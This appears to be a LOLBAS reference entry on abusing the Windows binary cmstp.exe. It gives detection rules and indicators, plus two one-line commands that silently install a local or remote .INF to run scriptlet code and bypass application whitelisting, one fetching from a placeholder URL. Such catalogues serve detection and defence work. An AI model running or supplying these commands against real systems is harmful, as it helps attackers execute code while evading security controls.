.. /Cmstp.exe
Star

AWL bypass (INF, Remote)

Installs or removes a Connection Manager service profile.

Paths:

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

Resources:

Acknowledgements:

Oddvar Moe (@oddvarmoe)
Nick Tyrer (@NickTyrer)

Detections:

Sigma: proc_creation_win_cmstp_execution_by_creation.yml
Sigma: proc_creation_win_uac_bypass_cmstp.yml
Splunk: cmlua_or_cmstplua_uac_bypass.yml
Elastic: defense_evasion_suspicious_managedcode_host_process.toml
Elastic: defense_evasion_unusual_process_network_connection.toml
IOC: Execution of cmstp.exe without a VPN use case is suspicious
IOC: DotNet CLR libraries loaded into cmstp.exe
IOC: DotNet CLR Usage Log - cmstp.exe.log

Execute

Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
cmstp.exe /ni /s C:\Windows\Temp\file.inf
```
Use case
Execute code hidden within an inf file. Download and run scriptlets from internet.

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1218.003: CMSTP
Tags
Execute: INF

AWL bypass

Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
cmstp.exe /ni /s https://www.example.org/file.inf
```
Use case
Execute code hidden within an inf file. Execute code directly from Internet.

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

ATT&CK® technique
T1218.003: CMSTP
Tags
Execute: INF
Execute: Remote